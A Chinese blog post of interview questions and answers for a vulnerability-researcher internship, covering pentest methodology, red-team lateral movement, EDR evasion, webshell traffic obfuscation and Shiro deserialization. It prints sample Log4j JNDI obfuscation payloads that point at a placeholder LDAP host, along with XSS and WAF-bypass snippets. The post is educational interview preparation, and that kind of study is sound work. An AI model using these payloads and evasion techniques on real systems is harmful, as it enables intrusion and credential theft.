2025年渗透测试面试题总结- 深某服-漏洞研究员实习(题目+回答)
网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
深信服-漏洞研究员实习
1. 在XX实习时做了什么
2. 渗透测试的思路简单描述
3. 护网中承担什么角色
4. 红队一些攻击思路
5. 拿下系统如何横向
6. Log4j漏洞(CVE-2021-44228)研究
7. 内存码(Shellcode Loader)了解
8. 冰蝎、哥斯拉工具分析
9. 攻击队研究重点
10. 擅长漏洞/攻击方向
11. Shiro反序列化漏洞解析
12. Bypass方法示例
深某服-漏洞研究员实习
在XX实习时做了什么渗透测试的思路简单描述护网中承担什么角色红队一些攻击思路拿下系统如何横向前段时间的那个log4j有研究吗,可以简单说一下吗(接上)有哪些混淆绕过的方法内存码有没有了解冰蝎、哥斯拉这些工具有没有了解过做攻击队的时候有没有研究过什么攻击,比如研究一些工具还是魔改什么的那么多漏洞和攻击,比较擅长哪一个说下shiro反序列化的形成原因、利用链对一些bypass的方法有没有了解过,什么姿势可以简单介绍一下。1. 在XX实习时做了什么
在实习期间,主要围绕渗透测试、漏洞挖掘和攻防实战展开:
- 渗透测试项目:参与内/外部资产的安全评估,包括Web应用、API接口和内部系统的漏洞扫描(如SQL注入、XSS、逻辑漏洞等)。
- 漏洞挖掘与利用:针对Java框架(Shiro、Fastjson)、中间件(WebLogic、Tomcat)进行代码审计,复现历史漏洞并尝试发现新攻击面。
- 红蓝对抗支持:协助防守方分析攻击流量,溯源攻击链;同时模拟攻击队编写PoC工具,绕过WAF规则。
- 报告输出:整理漏洞复现步骤、风险等级和修复方案,推动开发团队修复高危漏洞。
2. 渗透测试的思路简单描述
渗透测试核心流程分五阶段:
- 信息收集:
- 子域名枚举(如
subfinder)、端口扫描(nmap)、指纹识别(Wappalyzer)。- 敏感信息泄露(GitHub源码、备份文件、配置文件)。
- 漏洞扫描与验证:
- 工具自动化扫描(AWVS、Nessus),结合手动验证误报(如逻辑漏洞、未授权访问)。
- 权限提升:
- 通过弱口令、反序列化、文件上传等漏洞获取初始立足点。
- 横向移动:
- 利用内网协议(SMB、WinRM)、凭证窃取(Mimikatz)扩大控制范围。
- 报告输出:
- 输出漏洞详情、攻击路径图及修复建议。
3. 护网中承担什么角色
- 攻击队角色:
- 突破入口:针对暴露面(Web应用、VPN、邮件系统)进行漏洞利用(如Log4j、OA系统RCE)。
- 横向渗透:通过内网代理(如reGeorg)和口令爆破(Hydra)拿下域控或核心数据库。
- 防守经验:
- 分析攻击流量特征(如冰蝎流量加密),优化WAF规则;
- 协助处置应急事件(如Webshell查杀、日志溯源)。
4. 红队一些攻击思路
初始入侵阶段:
- 鱼叉攻击:钓鱼邮件投递恶意文档(CVE-2021-40444)或伪装升级包(供应链污染)。
- 0day/Nday利用:针对未修复的高危漏洞快速突破(如Confluence RCE)。
横向扩展阶段:
- 凭证窃取:通过Mimikatz提取内存密码、Kerberoasting攻击获取服务账户哈希。
- 权限维持:部署隐蔽后门(如计划任务、WMI事件订阅)、黄金票据伪造域管权限。
5. 拿下系统如何横向
横向移动关键步骤:
- 信息收集:
- 内网资产扫描(Netsparker、Fscan),定位高价值目标(数据库、域控)。
- 凭证利用:
- Pass-the-Hash(NTLM哈希传递)、Pass-the-Ticket(Kerberos票据转发)。
- 协议漏洞:
- 利用SMBGhost(CVE-2020-0796)、Zerologon(CVE-2020-1472)直接提权。
- 隐蔽通道:
- 通过DNS隧道(dnscat2)、HTTP代理(Chisel)绕过网络隔离。
6. Log4j漏洞(CVE-2021-44228)研究
原理:Log4j 2.x版本解析日志时,未对
${jndi:ldap://xxx}等表达式过滤,导致JNDI注入,远程加载恶意类触发RCE。混淆绕过方法:
- 环境变量注入:
${${env:XXX:-j}ndi:ldap://xxx}(利用默认值覆盖)。- Lower/Upper关键字:
${jNdi:ldap://xxx}(大小写绕过)。- 嵌套表达式:
${${::-j}ndi:ldap://xxx}(特殊符号替换)。- 绕过高版本限制:利用上下文变量(如
${ctx:xxx})拼接攻击载荷。
7. 内存码(Shellcode Loader)了解
- 原理:将恶意代码(如Cobalt Strike的Beacon)直接加载到内存中执行,避免文件落地。
- 常见技术:
- 反射型DLL注入:通过
VirtualAlloc分配内存并执行。- 进程镂空(Process Hollowing):替换合法进程内存内容(如svchost.exe )。
- 对抗检测:通过加密壳(如AES)、API调用混淆(如Syscall直接调用)绕过EDR。
8. 冰蝎、哥斯拉工具分析
- 冰蝎(Behinder):
- 特点:动态密钥加密流量(AES+随机Key),支持HTTP/HTTPS隧道。
- 检测难点:特征为固定
UA头和Content-Type: application/octet-stream。- 哥斯拉(Godzilla):
- 优势:支持更多加密算法(如RSA)、模块化功能(内网穿透、端口扫描)。
- 绕过技巧:修改默认密钥、自定义HTTP头字段混淆流量。
9. 攻击队研究重点
- 工具武器化:
- 魔改C2框架(如Cobalt Strike Aggressor脚本),适配目标环境。
- 开发轻量级漏洞利用工具(如Fastjson一键利用)。
- 流量混淆:
- 对Webshell流量进行分段编码(如Base64+Hex混合)、添加垃圾数据。
- 供应链攻击:
- 研究第三方组件漏洞(如npm包、Docker镜像投毒)。
10. 擅长漏洞/攻击方向
反序列化漏洞:
- 擅长点:Java反序列化链构造(如CommonsBeanutils、CC链)、内存马注入。
- 实战案例:通过Shiro RememberMe字段反序列化打入内网,结合JNDI注入加载内存马。
11. Shiro反序列化漏洞解析
形成原因:
- Shiro使用硬编码AES密钥加密
RememberMe字段,攻击者通过伪造Cookie触发反序列化。- 反序列化入口点:
AbstractRememberMeManager#decrypt方法。利用链(以CommonsBeanutils为例):
- 触发点:恶意Cookie → AES解密 → 反序列化 → 调用
BeanComparator.compare()。- 利用链:通过
PropertyUtils.getProperty()触发任意Getter方法,最终执行TemplatesImpl加载字节码。
12. Bypass方法示例
常见绕过姿势:
- 编码混淆:URL编码、Unicode转义(如
<img src=x onerror=alert(1)>→\u003cimg\u0020src=x...)。- 关键字分割:利用注释符或拼接(如
<svg/onload=alert``(1)>)。- 协议特性:
- HTTP参数污染(HPP):
param=1¶m=payload触发解析差异。- 特殊符号:
${1+1}在Thymeleaf等模板引擎中执行表达式。
相关文章:
2025年渗透测试面试题总结- 深某服-漏洞研究员实习(题目+回答)
网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。 目录 深信服-漏洞研究员实习 1. 在XX实习时做了什么 2. 渗透测试的思路简单描述 3. 护网中承担什么角色 4…...
(13)Anaconda 安装配置详解
1. Anaconda 简介 Anaconda 是一个用于科学计算和数据分析的 Python 发行版,它集成了 Python 解释器、大量常用的科学计算库以及强大的包管理工具。 2. Anaconda 主要特点 丰富的库集合:包含了超过 1500 个用于科学计算、数据分析、机器学习等领域的常用 Python 库,例如 N…...
MWC 2025 | 移远通信大模型解决方案加速落地,引领服务机器人创新变革
随着人工智能、大模型等技术的蓬勃发展,生成式AI应用全面爆发。在此背景下,服务机器人作为大模型技术在端侧落地的关键场景,迎来了前所未有的发展机遇。 作为与用户直接交互的智能设备,服务机器人需要应对复杂场景下的感知、决策和…...
[内网安全] Windows 域认证 — Kerberos 协议认证
🌟想系统化学习内网渗透?看看这个:[内网安全] 内网渗透 - 学习手册-CSDN博客 0x01:Kerberos 协议简介 Kerberos 是一种网络认证协议,其设计目标是通过密钥系统为客户机 / 服务器应用程序提供强大的认证服务。该认证过…...
[Computer Vision]实验七:图像检索
目录 一、实验内容 二、实验过程 2.1 准备数据集 2.2 SIFT特征提取 2.3 学习“视觉词典”(vision vocabulary) 2.4 建立图像索引并保存到数据库中 2.5 用一幅图像查询 三、实验小结 一、实验内容 实现基于颜色直方图、bag of word等方法的以图搜…...
C++之thread_local变量
C之thread_local变量_c threadlocal-CSDN博客 thread_local简介 thread_local 是 C11 为线程安全引进的变量声明符。表示对象的生命周期属于线程存储期。 线程局部存储(Thread Local Storage,TLS)是一种存储期(storage duration),对象的存储是在…...
【国产Linux | 银河麒麟】麒麟化龙——KylinOS下载到安装一条龙服务,起飞!
🗺️博客地图 📍一、下载地址 📍二、 系统安装 本文基于Windows操作系统vmware虚拟机安装 一、下载地址 官网:产品试用申请国产操作系统、麒麟操作系统——麒麟软件官方网站 下载自己需要的版本,完成后,…...
js中的execCommand怎么复制富文本内容解析)
(接“使用js去复制网页内容的方法”)js中的execCommand怎么复制富文本内容解析
document.execCommand(copy) 是传统的剪贴板操作方法,但它主要用于复制纯文本内容。如果你想复制富文本内容(包括 HTML 标签和样式),需要结合一些技巧来实现。以下是具体方法: 方法:通过创建隐藏的富文本元…...
npm ERR! code 128 npm ERR! An unknown git error occurred
【问题描述】 【问题解决】 管理员运行cmd(右键window --> 选择终端管理员) 执行命令 git config --global url.“https://”.insteadOf ssh://git cd 到项目目录 重新执行npm install 个人原因,这里执行npm install --registryhttps:…...
解决Leetcode第3470题全排列IV
3470.全排列IV 难度:困难 问题描述: 给你两个整数n和k,一个交替排列是前n个正整数的排列,且任意相邻两个元素不都为奇数或都为偶数。 返回第k个交替排列,并按字典序排序。如果有效的交替排列少于k个,则…...
MyBatis 配置文件核心
MyBatis 配置文件核心标签解析 以下是针对你的笔记中的三个核心标签的详细解析,帮助你全面理解它们的用途和配置逻辑。 1. properties 标签:动态加载外部配置 功能 将环境相关的配置(如数据库连接、密钥等)与 MyBatis 核心配置…...
bert模型笔记
1.各预训练模型说明 BERT模型在英文数据集上提供了两种大小的模型,Base和Large。Uncased是意味着输入的词都会转变成小写,cased是意味着输入的词会保存其大写(在命名实体识别等项目上需要)。Multilingual是支持多语言的࿰…...
微信小程序接入deepseek
先上效果 话不多说,直接上代码(本人用的hbuilder Xuniapp) <template><view class"container"><!-- 聊天内容区域 --><scroll-view class"chat-list" scroll-y :scroll-top"scrollTop":…...
推荐算法和推荐系统入门第一趴
以下是推荐系统技术总结的架构梳理和建议表达思路: 从原理到生产环境:推荐系统核心技术与实战代码解析 一、推荐算法的演进图谱 传统算法三剑客 ![推荐系统算法分类示意图] (使用Mermaid绘制算法分类关系图,清晰展示技术演进&am…...
unity pico开发 四 物体交互 抓取 交互层级
文章目录 手部设置物体交互物体抓取添加抓取抓取三种类型抓取点偏移抓取事件抓取时不让物体吸附到手部 射线抓取交互层级 手部设置 为手部(LeftHandController)添加XRDirInteractor脚本 并添加一个球形碰撞盒,勾选isTrigger,调整大小为0.1 …...
基于深度学习的青花瓷图像检索系统开发与实现
目录 1.研究背景与目的 1.1课题背景 1.2研究目的 二、调研资料情况 2.1图像分割研究现状 2.2图像检索调研 2.2.1选择深度学习进行检索的原因及优势 2.2.2基于深度学习的图像检索技术的发展 2.2.3基于深度学习的图像检索的研究重点 2.3基于深度学习的图像检索方法调研 …...
—— Vuex 的使用)
uniapp 系统学习,从入门到实战(八)—— Vuex 的使用
全篇大概 4500 字(含代码),建议阅读时间 30min 📚 目录 Vuex核心概念解析在 UniApp 中集成Vuex状态管理与数据共享实践总结 一、Vuex 核心概念解析 1.1 什么是状态管理 在跨多组件的大型应用中,不同页面/组件需要共享和修改相同数据时&am…...
Vue Hooks 深度解析:从原理到实践
Vue Hooks 深度解析:从原理到实践 前些天发现了一个巨牛的人工智能学习网站,通俗易懂,风趣幽默,忍不住分享一下给大家!点我试试!! 文章目录 Vue Hooks 深度解析:从原理到实践一、背景…...
django中序列化器serializer 的高级使用和需要注意的点
在 Django REST framework(DRF)中,序列化器(Serializer)是一个强大的工具,用于将复杂的数据类型(如 Django 模型实例)转换为 Python 原生数据类型,以便将其渲染为 JSON、XML 等格式,同时也能将接收到的外部数据反序列化为 Django 模型实例。以下将介绍序列化器的高级…...
靶场(二)---靶场心得小白分享
开始: 看一下本地IP 21有未授权访问的话,就从21先看起 PORT STATE SERVICE VERSION 20/tcp closed ftp-data 21/tcp open ftp vsftpd 2.0.8 or later | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Cant get dire…...
51c自动驾驶~合集58
我自己的原文哦~ https://blog.51cto.com/whaosoft/13967107 #CCA-Attention 全局池化局部保留,CCA-Attention为LLM长文本建模带来突破性进展 琶洲实验室、华南理工大学联合推出关键上下文感知注意力机制(CCA-Attention),…...
Leetcode 3576. Transform Array to All Equal Elements
Leetcode 3576. Transform Array to All Equal Elements 1. 解题思路2. 代码实现 题目链接:3576. Transform Array to All Equal Elements 1. 解题思路 这一题思路上就是分别考察一下是否能将其转化为全1或者全-1数组即可。 至于每一种情况是否可以达到…...
(十)学生端搭建
本次旨在将之前的已完成的部分功能进行拼装到学生端,同时完善学生端的构建。本次工作主要包括: 1.学生端整体界面布局 2.模拟考场与部分个人画像流程的串联 3.整体学生端逻辑 一、学生端 在主界面可以选择自己的用户角色 选择学生则进入学生登录界面…...
Oracle查询表空间大小
1 查询数据库中所有的表空间以及表空间所占空间的大小 SELECTtablespace_name,sum( bytes ) / 1024 / 1024 FROMdba_data_files GROUP BYtablespace_name; 2 Oracle查询表空间大小及每个表所占空间的大小 SELECTtablespace_name,file_id,file_name,round( bytes / ( 1024 …...
MFC内存泄露
1、泄露代码示例 void X::SetApplicationBtn() {CMFCRibbonApplicationButton* pBtn GetApplicationButton();// 获取 Ribbon Bar 指针// 创建自定义按钮CCustomRibbonAppButton* pCustomButton new CCustomRibbonAppButton();pCustomButton->SetImage(IDB_BITMAP_Jdp26)…...
)
【位运算】消失的两个数字(hard)
消失的两个数字(hard) 题⽬描述:解法(位运算):Java 算法代码:更简便代码 题⽬链接:⾯试题 17.19. 消失的两个数字 题⽬描述: 给定⼀个数组,包含从 1 到 N 所有…...
大语言模型如何处理长文本?常用文本分割技术详解
为什么需要文本分割? 引言:为什么需要文本分割?一、基础文本分割方法1. 按段落分割(Paragraph Splitting)2. 按句子分割(Sentence Splitting)二、高级文本分割策略3. 重叠分割(Sliding Window)4. 递归分割(Recursive Splitting)三、生产级工具推荐5. 使用LangChain的…...
Java多线程实现之Callable接口深度解析
Java多线程实现之Callable接口深度解析 一、Callable接口概述1.1 接口定义1.2 与Runnable接口的对比1.3 Future接口与FutureTask类 二、Callable接口的基本使用方法2.1 传统方式实现Callable接口2.2 使用Lambda表达式简化Callable实现2.3 使用FutureTask类执行Callable任务 三、…...
html css js网页制作成品——HTML+CSS榴莲商城网页设计(4页)附源码
目录 一、👨🎓网站题目 二、✍️网站描述 三、📚网站介绍 四、🌐网站效果 五、🪓 代码实现 🧱HTML 六、🥇 如何让学习不再盲目 七、🎁更多干货 一、👨…...
Kafka入门-生产者
生产者 生产者发送流程: 延迟时间为0ms时,也就意味着每当有数据就会直接发送 异步发送API 异步发送和同步发送的不同在于:异步发送不需要等待结果,同步发送必须等待结果才能进行下一步发送。 普通异步发送 首先导入所需的k…...